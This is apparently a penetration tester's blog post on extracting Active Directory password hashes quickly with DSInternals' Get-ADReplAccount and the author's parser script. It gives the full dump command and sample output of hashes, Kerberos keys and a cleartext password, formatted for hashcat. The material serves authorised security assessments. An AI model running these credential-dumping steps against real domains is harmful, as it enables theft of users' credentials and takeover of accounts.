Extracting NTDS Users Data... The Fastest Way.

Extracting what?

One of the most tedious and long tasks a pentester has to do when assessing a company's domain, is the extraction of the NTDS.dit file, located (usually) in the Domain Controllers of the Active Directory.

Retrieving the hashes of all users from the Active Directory is the first thing that a hacker (well... I think) should do after obtaining Domain Admin privileges. Obtaining the LM/NTLM hashes is crucial; it gives a huge list of possibilities to maintain access after an effective exploitation (i.e. Golden Ticket, password cracking, pass-the hash, etc.), and looks beautiful when is documented in a pentesting report ;)

Common ways to dump hashes

There are at least 3 well known ways of extracting the LM/NTLM hashes from Active Directory.

  1. Extracting the NTDS.dit file from a shadow copy using vssadmin, dumping the tables datatable and link_table with esedbexport of esedebtools framework, and retrieving the users data using scripts of the NTDSXTract framework, such as dsusers.py or dshashes.py
  2. Loading an executable (or malicious) file to a Domain Controller, such as dumpntds.exe (Github), creating the datatable and link_table files, or executing a meterpreter, and then running hashdump.
  3. Retrieving hashes (and maybe passwords) remotely using the Get-ADReplAccount script from DSInternals suite.
Probably, all the methods are effective, and all of them retrieves the data we are looking for. But not all of them are efficient (or effective?). 

Method 1: Getting the NTDS.dit and processing offline

Cons:

  • When the NTDS.dit file is huge, usually because of the existence of many users, copying and downloading the file is very time-consuming. Worst is the case when the network is slow.
  • After the tragic download of the NTDS.dit file, now its needed to extract the datatable and link_table files. The process time of this task is proportional to the amount of users registered in the domain. (Once, I had to extract hashes from a domain that have a 10GB NTDS.dit file. I spent almost a week to obtain the domain users LM/NTLM hashes).

Method 2: Extracting the tables on the DC  processing them offline

Cons:

  • Leading the dumping tables process of the NTDS.dit file over the Domain Controller, could be less longer than the method 1, but it is still inefficient.
  • We have to deal again with the processing task of the datatable and link_table files, that is pretty time-wasting in some cases.
  • On the other hand, meterpreter dumps the LM/NTLM hashes pretty quick, but unfortunately, the hashdump module does not get all the hashes.

Method 3: Retrieving hashes remotely with DSInternals.

Cons:

  • This is probably the fastest way to obtain the info we are looking for. But, despite of the quickness of the process, the output is not comprehensible for the password cracking tools (i.e. hashcat, john, l0phtcrack).
  • Parsing the file to lead the password cracking process could be tedious.

The fastest way

The fastest way is retrieving hashes with DSInternals suite, but the output file is not readable for the most common password cracking tools.

To make easier the LM/NTLM hashes extraction process, I have developed a script that uses the Get-ADReplAccount output, and parses it to a passwords cracking friendly format. The script is called dsinternalsparser.py and can be downloaded here.

-----------------------
DSInternals Parser v1.0
-----------------------
usage: dsinternalsparser.py [-h] [-o OUTPUT] [--ntlm] [--nthistory] [--lm]
[--lmhistory] [--cleartext] [--wdigest]
input_file
Parses a Get-ADReplAccount generated file to extract credentials data,
including hashes.
positional arguments:
input_file File to process, generated by Get-ADReplAccount of
DSInternals
optional arguments:
-h, --help show this help message and exit
-o OUTPUT, --output OUTPUT
Prefix name for output files.
--ntlm Generate the file with username and current NTLM hash.
--nthistory Generate the file with username and history NTLM
hashes.
--lm Generate the file with username and current LM hash.
--lmhistory Generate the file with username and history LM hashes.
--cleartext Generate the file with existent users that have
ClearText password.
--wdigest Generate the file with existent users that have
Wdigest password.

The script takes the output file of the Get-ADReplAccount execution, and creates text files containing the data distributed and organized. To make it clear, let's do an example.

Execute the following command to obtain all the user data, right after setting the $cred var with the Get-Credential cmdlet:

Get-ADReplAccount -All -Server dc01 -NamingContext "dc=anotherdomain,dc=org" -Credential $cred > output.txt

After executing the Get-ADReplAccount, we obtain a file like this one:

example.txt
-----------
DistinguishedName: CN=April Reagan,OU=IT,DC=Adatum,DC=com
Sid: S-1-5-21-3180365339-800773672-3767752645-1375
Guid: 124ae098-699b-4450-a47a-314a29cc90ea
SamAccountName: April
SamAccountType: User
UserPrincipalName: April@adatum.com
PrimaryGroupId: 513
SidHistory:
Enabled: True
Deleted: False
LastLogon:
DisplayName: April Reagan
GivenName: April
Surname: Reagan
Description:
NTHash: 92937945b518814341de3f726500d4ff
LMHash: 727e3576618fa1754a3b108f3fa6cb6d
NTHashHistory:
Hash 01: 92937945b518814341de3f726500d4ff
Hash 02: 1d3da193d2f45911a6f0fa940b9fb32f
Hash 03: 402bc59d8a00641b7f386e78596340f4
LMHashHistory:
Hash 01: 727e3576618fa1754a3b108f3fa6cb6d
Hash 02: 5a5503d0e85f58abaad3b435b51404ee
Hash 03: f9393d97e7a1873caad3b435b51404ee
SupplementalCredentials:
ClearText: Pa$$w0rd
Kerberos:
Credentials:
DES_CBC_MD5
Key: 76fe3b5bda911a40
OldCredentials:
DES_CBC_MD5
Key: 7f8c4f38e0ea0b80
Salt: ADATUM.COMApril
Flags: 0
KerberosNew:
Credentials:
AES256_CTS_HMAC_SHA1_96
Key: 3a3b6a89bb82d112db5ef68f6db5d1afc2b806df61dcd85e3eacf3b85ee382d8
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: a72c8bc96c4a6f03244f0b0067a1e440
Iterations: 4096
DES_CBC_MD5
Key: 76fe3b5bda911a40
Iterations: 4096
OldCredentials:
AES256_CTS_HMAC_SHA1_96
Key: 14e46244a59a37cd8aa7c1fe61896441c7d065fafe4874191e69c1fe28856810
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: 034b512ec64286dec951d6aff8d81fa8
Iterations: 4096
DES_CBC_MD5
Key: 7f8c4f38e0ea0b80
Iterations: 4096
OlderCredentials:
AES256_CTS_HMAC_SHA1_96
Key: 2387ca8f936c8c154996809af8fee7c47fe4b9b5dd84d051fc43a9289bbaa3ab
Iterations: 4096
AES128_CTS_HMAC_SHA1_96
Key: 29d536ec057f9063747161429b81f056
Iterations: 4096
DES_CBC_MD5
Key: 58f1cbe6e50e1f83
Iterations: 4096
ServiceCredentials:
Salt: ADATUM.COMApril
DefaultIterationCount: 4096
Flags: 0
WDigest:
Hash 01: c3d012ab1101eb8f51b483fb4c5f8a7e
Hash 02: c993da396914645b356ae7816251fcb1
Hash 03: 6b58530cab34de91189a603e22c2be15
Hash 04: c3d012ab1101eb8f51b483fb4c5f8a7e
Hash 05: 5a762cf59fa31023dcba1ebd4725b443
Hash 06: c78bac91c0ba25cae5d44460fd65a73b
Hash 07: 59d73cea16afd1aac6bf8acfa2768621
Hash 08: d2be383db9469a39736d9e2136054131
Hash 09: 079de9f4d94d97a80f1726497dfd1cc2
Hash 10: 85dbe1549d5fbfcc91f7fe5ac5910f52
Hash 11: 961a36bded5535b8fc15b4b8e6c48b93
Hash 12: 6ac8a60d83e9ae67c2097db716a6af17
Hash 13: e899e577d5f81ef5288ab67de07fad9a
Hash 14: 135452ab86d40c3d47ca849646d5e176
Hash 15: a84c367eaa334d0a4cb98e36da011e0f
Hash 16: 61a458eb70440b1a92639452f0c2c948
Hash 17: 238f4059776c3575be534afb46be4ccf
Hash 18: 03ddf370064c544e9c6dbb6ccbf8f4ac
Hash 19: 354dd6c77ccf35f63e48cd5af6473ccf
Hash 20: 5f9800d734ebe9fb588def6aaafc40b7
Hash 21: 59aab99ebcddcbf13b96d75bb7a731e3
Hash 22: f1685383b0c131035ae264ee5bd24a8d
Hash 23: 3119e42886b01cad00347e72d0cee594
Hash 24: ebef7f2c730e17ded8cba1ed20122602
Hash 25: 7d99673c9895e0b9c484e430578ee78e
Hash 26: e1e20982753c6a1140c1a8241b23b9ea
Hash 27: e5ec1c63e0e549e49cda218bc3752051
Hash 28: 26f2d85f7513d73dd93ab3afd2d90cf6
Hash 29: 84010d657e6b58ce233fae2bd7644222

In the example.txt file, we dump a domain with only one user. Now, to process the file, we use the 
dsinternalsparser.py, executing on a terminal:


./dsinternalsparser.py example.txt

After the processing, by default, the script generates all the possible output files with the prefix output. In case you want to get only certain files, you must specify as a parameter the files you intend to generate (i.e. --ntlm, --cleartext, --lmhistory, etc.). The same occurs if you want to change the output filenames, using the -o parameter.

As a result, the script generates the output files like these ones:

--------------------
output_cleartext.txt
--------------------
April:Pa$$w0rd
-------------
output_lm.txt
-------------
April:727e3576618fa1754a3b108f3fa6cb6d
-------------
output_ntlm.txt
-------------
April:92937945b518814341de3f726500d4ff
---------------------
output_lm_history.txt
---------------------
April_lmhistory0:727e3576618fa1754a3b108f3fa6cb6d
April_lmhistory1:5a5503d0e85f58abaad3b435b51404ee
April_lmhistory2:f9393d97e7a1873caad3b435b51404ee
-----------------------
output_ntlm_history.txt
-----------------------
April_nthistory0:92937945b518814341de3f726500d4ff
April_nthistory1:1d3da193d2f45911a6f0fa940b9fb32f
April_nthistory2:402bc59d8a00641b7f386e78596340f4
---------------------
output_wdigest.txt
---------------------
April_wdhistory0:c3d012ab1101eb8f51b483fb4c5f8a7e
April_wdhistory1:c993da396914645b356ae7816251fcb1
April_wdhistory2:6b58530cab34de91189a603e22c2be15
April_wdhistory3:c3d012ab1101eb8f51b483fb4c5f8a7e
April_wdhistory4:5a762cf59fa31023dcba1ebd4725b443
April_wdhistory5:c78bac91c0ba25cae5d44460fd65a73b
April_wdhistory6:59d73cea16afd1aac6bf8acfa2768621
April_wdhistory7:d2be383db9469a39736d9e2136054131
April_wdhistory8:079de9f4d94d97a80f1726497dfd1cc2
April_wdhistory9:85dbe1549d5fbfcc91f7fe5ac5910f52
April_wdhistory10:961a36bded5535b8fc15b4b8e6c48b93
April_wdhistory11:6ac8a60d83e9ae67c2097db716a6af17
April_wdhistory12:e899e577d5f81ef5288ab67de07fad9a
April_wdhistory13:135452ab86d40c3d47ca849646d5e176
April_wdhistory14:a84c367eaa334d0a4cb98e36da011e0f
April_wdhistory15:61a458eb70440b1a92639452f0c2c948
April_wdhistory16:238f4059776c3575be534afb46be4ccf
April_wdhistory17:03ddf370064c544e9c6dbb6ccbf8f4ac
April_wdhistory18:354dd6c77ccf35f63e48cd5af6473ccf
April_wdhistory19:5f9800d734ebe9fb588def6aaafc40b7
April_wdhistory20:59aab99ebcddcbf13b96d75bb7a731e3
April_wdhistory21:f1685383b0c131035ae264ee5bd24a8d
April_wdhistory22:3119e42886b01cad00347e72d0cee594
April_wdhistory23:ebef7f2c730e17ded8cba1ed20122602
April_wdhistory24:7d99673c9895e0b9c484e430578ee78e
April_wdhistory25:e1e20982753c6a1140c1a8241b23b9ea
April_wdhistory26:e5ec1c63e0e549e49cda218bc3752051
April_wdhistory27:26f2d85f7513d73dd93ab3afd2d90cf6
April_wdhistory28:84010d657e6b58ce233fae2bd7644222


These files can be used to make faster the processing of Domain Users information, including the password cracking process. 


I compared the time processing from NTDS.dit to LM/NTLM hashes on a 10GB file. As I mentioned, I spent on the traditional way almost a week to obtain the data to start the password cracking. Using this last method, I could obtain all the hashes in hashcat format in 20 minutes.

To resume, the fastest way (I have found) you can dump the Domain Users information from NTDS.dit file is:

  1. Get the output file from Get-ADReplAccount module execution.
  2. Download the file and parse it with dsinternalsparser.py.
  3. Enjoy >:)
For more information about the Get-ADReplAccount module, and DSInternals, refer to:
If you have questions about the dsinternalsparser.py, go to:

Happy dumping.


¬#r4wd3r'

Comentarios

Entradas populares de este blog

RID Hijacking: Maintaining access on Windows machines

Off-by-one overflow explained